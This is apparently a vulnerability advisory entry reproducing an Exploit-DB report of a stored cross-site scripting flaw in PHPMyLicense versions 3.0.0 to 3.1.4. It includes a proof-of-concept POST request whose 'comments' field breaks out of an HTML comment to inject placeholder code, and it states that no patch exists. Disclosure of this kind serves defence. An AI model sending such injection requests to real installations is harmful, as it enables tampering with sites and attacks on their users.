PHPMyLicense Stored Cross Site Scripting

vendor:

PHPMyLicense

by:

Aria Akhavan Rezayat

8,8

CVSS

HIGH

Stored Cross Site Scripting

CWE

Product Name: PHPMyLicense

Affected Version From: 3.0.0

Affected Version To: 3.1.4

Patch Exists: NO

Related CWE: None

CPE: a:phpmylicense:phpmylicense

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Webapps

2015

PHPMyLicense Stored Cross Site Scripting

Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

Mitigation:

No Update available for it.

Source

Exploit-DB raw data:

Hello, I want to report following exploit:


# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps

1.) Description:

Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

2.) Proof of Concept:

localhost/phpmylicense/ajax/

POST:

comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing

3.) Solution:

None. - No Update available for it.